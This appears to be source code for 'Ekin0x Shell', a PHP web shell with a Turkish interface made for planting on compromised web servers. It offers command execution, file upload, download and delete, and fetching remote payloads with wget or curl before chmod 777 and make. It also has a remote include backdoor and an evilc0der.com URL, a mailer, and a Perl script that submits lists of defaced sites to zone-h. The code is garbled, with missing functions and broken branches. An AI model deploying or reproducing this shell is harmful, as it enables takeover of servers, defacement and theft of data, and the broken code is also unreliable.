<?
/*###########################################
Ekin0x Shell volume 2.1
Don't make any changes in c0de except if you dont know php programming
Thanx : VoLqaN | Entrika | Moroccon Islam Defenders | H-B-V | xoron | AuGuSt27 and all Cyber-warrior.org Memberz
###########################################*/
$a = "http://";
$b = "evilc0der.com";
$c = "/x.html";
{$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
if (strstr ($requ,
$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/",
"$link=$val",
$requ);
}elseif (strstr ($requ,
"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/",
"$link=$val",
$requ);
} elseif (strstr ($requ,
"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/",
"$link=$val",
$requ);
}elseif (strstr($requ,
"?")){return $requ.
"&".
$link.
"=".
$val;
} else{return $requ."?".$link."=".$val;}}
function delm
($delmtxt){print"<center><table bgcolor=Black style='border:1px solidDeepSkyBlue ' width=99% height=2%>";print
"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";
} function input($type,$name,$value,$size)
{if (empty($value)){print "<input type=$type name=$name size=$size>";
} elseif(empty($name)&&empty
($size)){print "<input type=$type value=$value >";
} elseif(empty($size)){print "<input type=$type name=$name value=$value >";
} else {print "<input type=$type name=$name value=$value size=$size >";
}} callperms
($path);
print "</font>";
}callperms
($path);
print "</font>";
}else {print "<font color=DeepSkyBlue >";callperms
($path);
}} if ($dlink=="dwld"){download($_REQUEST['dwld']);}
function download
($dwfile) {$size =
filesize($dwfile);
@
header("Content-Type: application/force-download;name=$dwfile");
@
header("Content-Transfer-Encoding: binary");
@
header("Content-Length: $size");
@
header("Content-Disposition: attachment; filename=$dwfile");
@
header("Cache-Control: no-cache, must-revalidate");
?>
<? include $_GET['baba']; ?>
<html>
<head><title>Ekin0x Shell</title></head>
<style>
BODY { SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:red}
input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue smoke}
select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
</body>
</html>
<?
$sf="<form method=post>";$ef="</form>";
$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
$sfnt="<font face=tahoma size=2 color=DeepSkyBlue >";$efnt="</font>";
################# Ending of common variables ########################
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print
"<tr><td>";
print"<b><center><font face=tahoma color=DeepSkyBlue size=6> ## Ekin0x Shell ## </font></b></center>";
print"</td></tr>";print
"</table>";print
"<br>";
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print
"<tr><td>";
print"<center><div><b>";print
"<a href=".inclink
('dlink',
'home').
">Home</a>";
print " - <a href='javascript:history.back()'>Geri</a>";
print " - <a target='_blank' href=".inclink
('dlink',
'phpinfo').
">phpinfo</a>";
print " - <a href=".inclink
('dlink',
'basepw').
">Base64 decode</a>";
print " - <a href=".inclink
('dlink',
'urld').
">Url decode</a>";
print " - <a href=".inclink
('dlink',
'urlen').
">Url encode</a>";
print " - <a href=".inclink
('dlink',
'mdf').
">Md5</a>";
print " - <a href=".inclink
('dlink',
'perm').
"&scdir=$nscdir>Izinleri Kontrol Et</a>";
print " - <a href=".inclink
('dlink',
'showsrc').
"&scdir=$nscdir>File source</a>";
print " - <a href=".inclink
('dlink',
'qindx').
"&scdir=$nscdir>Quick index</a>";
print " - <a href=".inclink
('dlink',
'zone').
"&scdir=$nscdir>Zone-h</a>";
print " - <a href=".inclink
('dlink',
'mail').
"&scdir=$nscdir>Mail</a>";
print " - <a href=".inclink
('dlink',
'cmdhlp').
"&scdir=$nscdir>Cmd help</a>";
print "<p>Result is : $sfnt".
$cbase.
"$efnt";
die();
} if ($dlink==
"basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
print $sf;input
("text",
"ncbase",
$ncbase,
35);print
" ";
input
("submit",
"",
"Decode",
"");print
$ef;
die();
}if (isset ($_REQUEST['nurld'])){$urldc =
(urldecode ($_REQUEST['nurld']));
print "<p>Result is : $sfnt".
$urldc.
"$efnt";
die();
}if ($dlink==
'urld'){ input ("text","nurld",$nurld,35);print " ";
input
("submit",
"",
"Decode",
"");print
$ef;
die();
}if ($dlink==
'urlen'){print "<p><b>[ Url - Encoder ]</b>";
print $sf;input
("text",
"nurlen",
$nurlen,
35);print
" "; input
("submit",
"",
"Encode",
"");print
$ef;
die();
} if (isset ($_REQUEST['nmdf'])){$mdfe =
(md5 ($_REQUEST['nmdf']));
print "<p>Result is : $sfnt".
$mdfe.
"$efnt";
die();
}if ($dlink==
'mdf'){ print "<p><b>[ MD5 - Encoder ]</b>";
print $sf;input
("text",
"nmdf",
$nmdf,
35);print
" ";
input
("hidden",
"scdir",
$scdir,
22); input
("submit",
"",
"Encode",
"");print
$ef;die
();
}if ($dlink==
'perm'){print $sf;input
("submit",
"mfldr",
"Main-fldr",
"");print
" ";input
("submit",
"sfldr",
"Sub-fldr",
"");print
$ef;
print "<pre>";print
"<p><textarea cols=120 rows=12>";
if (isset($_REQUEST['mfldr'])){callfuncs
('find . -type d -perm -2 -ls');
}elseif (isset($_REQUEST['sfldr'])){callfuncs
('find ../ -type d -perm -2 -ls');
}print "</textarea>";print
"</pre>";die
();
} function callshsrc
($showsc){if(isset($showsc)&&filesize
($showsc)==
"0"){ print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die
();
} elseif(isset($showsc)&&filesize
($showsc) !==
"0") { print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
if (!
show_source($showsc)||!
function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die
();
}print "</td></tr></table>";die
();
}}if ($dlink==
'showsrc'){ print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print
"<form method=get>";
input ("text","showsc","",35);print " ";
input
("hidden",
"scdir",
$scdir,
22);input
("submit",
"subshsc",
"Show-src",
"");print
$ef;
die();
}if(isset($_REQUEST['showsc'])){callshsrc
(trim($_REQUEST['showsc']));
}if ($dlink=='cmdhlp'){
print "<p><b>: Insert the command below to get help or to know more about it's uses :";print
"<form method=get>";
input ("text","hlp","",35);print " ";
input
("submit",
"",
"Help",
"");print
$ef;
die();
}if (isset ($_REQUEST['hlp'])){$hlp=
$_REQUEST['hlp'];
print "<p><b>[ The command is $sfnt".
$hlp.
"$efnt ]";
$hlp =
escapeshellcmd($hlp);print
"<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";
}else {print "<pre><font color=black>";
if(!callfuncs
("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";
}print "</pre></font>";
}print "</td></tr></table>";die
();
} if (isset($_REQUEST['indx'])&&!
empty($_REQUEST['indxtxt'])) {if (touch ($_REQUEST['indx'])==
true){ fclose($fp);print
"<p>[ $sfnt".
$_REQUEST['indx'].
"$efnt created successfully !! ]</p>";print
"<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a> ] -- [<a href=".inclink
('dlink',
'scurrdir').
"&scdir=$nscdir> Curr-Dir </a>]</center></b>";die
();
}else {print "<p>[ Sorry, Can't create the index !! ]</p>";die
();
}} if ($dlink==
'qindx'&&!
isset($_REQUEST['qindsub'])){ print $sf.
"<br>";print
"<p><textarea cols=50 rows=10 name=indxtxt> Your index contents here</textarea></p>";
input ("text","indx","Index-name",35);print " ";
input ("submit","qindsub","Create","");print $ef;die();}
if (isset ($_REQUEST['mailsub'])&&!
empty($_REQUEST['mailto'])){ $mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
if (mail($mailto,
$subj,
$mailtxt)){print "<p>[ Mail sended to $sfnt".
$mailto.
" $efnt successfully ]</p>";
die();
}else {print "<p>[ Error, Can't send the mail ]</p>";die
();
}} elseif(isset ($mailsub)&&empty
($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die
();
} if ($dlink==
'mail'&&!
isset($_REQUEST['mailsub'])){ print $sf.
"<br>";print
"<p><textarea cols=50 rows=10 name=mailtxt> Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
input ("submit","mailsub","Send-mail","");print $ef;die();}
if (isset($_REQUEST['zonet'])&&!
empty($_REQUEST['zonet'])){callzone
($nscdir);
} function callzone($nscdir){
if (is_writable($nscdir)){$fpz=
fopen ("z.pl",
"w");
$zpl=
'z.pl';
$li=
"bklist.txt";
} else {$fpz=
fopen ("/tmp/z.pl",
"w");
$zpl=
'/tmp/z.pl';
$li=
"/tmp/bklist.txt";
} fwrite ($fpz,
"\$arq = @ARGV[0]; \$grupo = @ARGV[1];
chomp \$grupo;
open(a,\"<\$arq\");
@site = <a>;
close(a);
\$b = scalar(@site);
for(\$a=0;\$a<=\$b;\$a++)
{chomp \$site[\$a];
if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
print \"[+] Sending \$site[\$a]\n\";
use IO::Socket::INET;
\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
print \$sock \"Accept: */*\r\n\";
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
print \$sock \"Accept-Language: pt-br\r\n\";
print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
print \$sock \"Connection: Keep-Alive\r\n\";
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
print \$sock \"Host: old.zone-h.org\r\n\";
print \$sock \"Content-Length: 385\r\n\";
print \$sock \"Pragma: no-cache\r\n\";
print \$sock \"\r\n\";
print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\";
close(\$sock);}");
if (touch ($li)==
true){$fpl=
fopen($li,
"w+");fwrite
($fpl,
$_REQUEST['zonetxt']);
}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";
}$zonet=
$_REQUEST['zonet'];
{print "[ Can't complete the operation !! ]";
} else {callfuncs("chmod 777 $zpl;chmod 777 $li");
ob_start();callfuncs
("perl $zpl $li $zonet");ob_clean
();
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die
();
} }if ($dlink==
'zone'&&!
isset($_REQUEST['zonesub'])){ print $sf.
"<br>";print
"<p><pre><textarea cols=50 rows=10 name=zonetxt> www.site1.com
www.site2.com
</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
input ("submit","zonesub","Send","");print $ef;die();}
print "</div></b></center>";
print"</td></tr>";print
"</table>";print
"<br>";
function inisaf
($iniv) { $chkini=
ini_get($iniv);
if(($chkini ||
strtolower($chkini)) !==
'on'){print"<font color=DeepSkyBlue ><b>Kapali ( Guvenlik Yok )</b></font>";
} else{ print"<font color=red><b>Acik ( Guvenli )</b></font>";
}}function inifunc
($inif){$chkin=
ini_get($inif);
if ($chkin==
""){print " <font color=red><b>None</b></font>";
} if($nval=
$owhich){print"<font color=red><b>ON</b></font>";
} else{print"<font color=DeepSkyBlue ><b>OFF</b></font>";
} } print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
print"<b>Safe-mode :\t";print inisaf
('safe_mode');print
"</b>";print
"</center>";
print "<div align=center>";
print"<br><b>Mysql : </b>";
callocmd('which mysql','/usr/bin/mysql');
callocmd
('which perl',
('/usr/bin/perl')||
'/usr/local/bin/perl');print
"</td>";
print"<td>";
print"<br><b>Gcc : </b>";
callocmd
('which gcc',
'/usr/bin/gcc');
print"</td>";
print"<td>";
print"<br><b>Curl : </b>"; callocmd
('which curl',
'/usr/bin/curl');
print"</td>";
print"<td>";
print"<br><b>GET : </b>";
callocmd('which GET','/usr/bin/GET');
print"</td>";
print"<td>";print
"<br><b>Wget : </b>";
callocmd('which wget','/usr/bin/wget');
callocmd('which lynx','/usr/bin/lynx');
print "<b>IP Numaran : ".
$REMOTE_ADDR.
"<br></b>";
print "<b>Server IP : ".
$SERVER_ADDR.
"</b>";
print"<br><b>".
$SERVER_SIGNATURE.
"</b>";
print "<b>Server ADI : ".
$SERVER_NAME.
" / ".
"Email : ".
$SERVER_ADMIN.
"<br></b>";
print "<b>Engelli Fonksiyonlar : </b>";inifunc
(disable_functions
);print
"<br>";
print "<b>Kimsin : <b>"; callfuncs
('id');print
"<br><b>Os : </b>";
else {callfuncs
('uname -a');
}}print"<br>";
print $nscdir.
" [ ";permcol
($nscdir);print
" ]";
print"<br>";print
"Shell'in Burda : " .
__file__;
print "</center><br></font>";
print"</td></tr></table><br>";
if (isset($_REQUEST['credir'])) { $ndir=
trim($_REQUEST['dir']);
if (mkdir( $ndir,
0777 )){ $mess=
basename($ndir).
" created successfully";
} else{$mess=
"Klas??r Olustur/Sil";
}}elseif (isset($_REQUEST['deldir'])) { $nrm=
trim($_REQUEST['dir']);if
(is_dir($nrm)&&
rmdir($nrm)){$mess=
basename($nrm).
" deleted successfully";
}else{$mess=
"Create/Delete Dir";
}} else{$mess=
"Klas??r Olustur/Sil";
}if(isset($_REQUEST['crefile'])){ $ncfile=
trim($_REQUEST['cfile']);
if (!
is_file($ncfile)&&touch
($ncfile)){ $mess3=
basename($ncfile).
" created succefully";unset
($_REQUEST['cfile']);
} else{ $mess3= "Dosya Olustur/Sil";}}
elseif(isset($_REQUEST['delfile'])){ $ndfile=
trim($_REQUEST['cfile']);
if (unlink($ndfile)) {$mess3=
basename($ndfile).
" deleted succefully";
} else {$mess3= "Dosya Olustur/Sil";}}
else {$mess3="Dosya Olustur/Sil";}
class upload{ function upload($file,$tmp){
if (@
copy($tmp,
$nscdir.
"/".
$file)){ print "<div><center><b>:<font color=DeepSkyBlue > $file </font>uploaded successfully :</b></center></div>";
}else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";
} } } } $obj=
new upload
($HTTP_POST_FILES['upfile']['name'],
$HTTP_POST_FILES['upfile']['tmp_name']);
if (isset ($_REQUEST['ustsub'])){ $ustname=
trim ($_REQUEST['ustname']);ob_start
();
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
if ($_REQUEST['ustools']=
't8'){callfuncs
('make '.
$ustname);
}ob_clean();
} if (!
isset($_REQUEST['cmd'])&&!
isset($_REQUEST['eval'])&&!
isset($_REQUEST['rfile'])&&!
isset($_REQUEST['edit'])&&!
isset($_REQUEST['subqcmnds'])&&!
isset ($_REQUEST['safefile'])&&!
isset ($_REQUEST['inifile'])&&!
isset($_REQUEST['bip'])&&
!
isset($_REQUEST['rfiletxt'])){if ($dh =
dir($nscdir)){ while (true ==
($filename =
$dh->
read())){ $files[] =
$filename;
sort($files);
}print "<br>";
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
print "<tr><td width=43% style=\"border:1px solid black\">";
print "<center><b>Dosyalar";print
"</td>";
print "<td width=8% style=\"border:1px solid black\">";print
"<center><b>Boyut";print
"</td>";
print "<td width=3% style=\"border:1px solid black\">";print
"<center><b>Yazma";print
"</td>";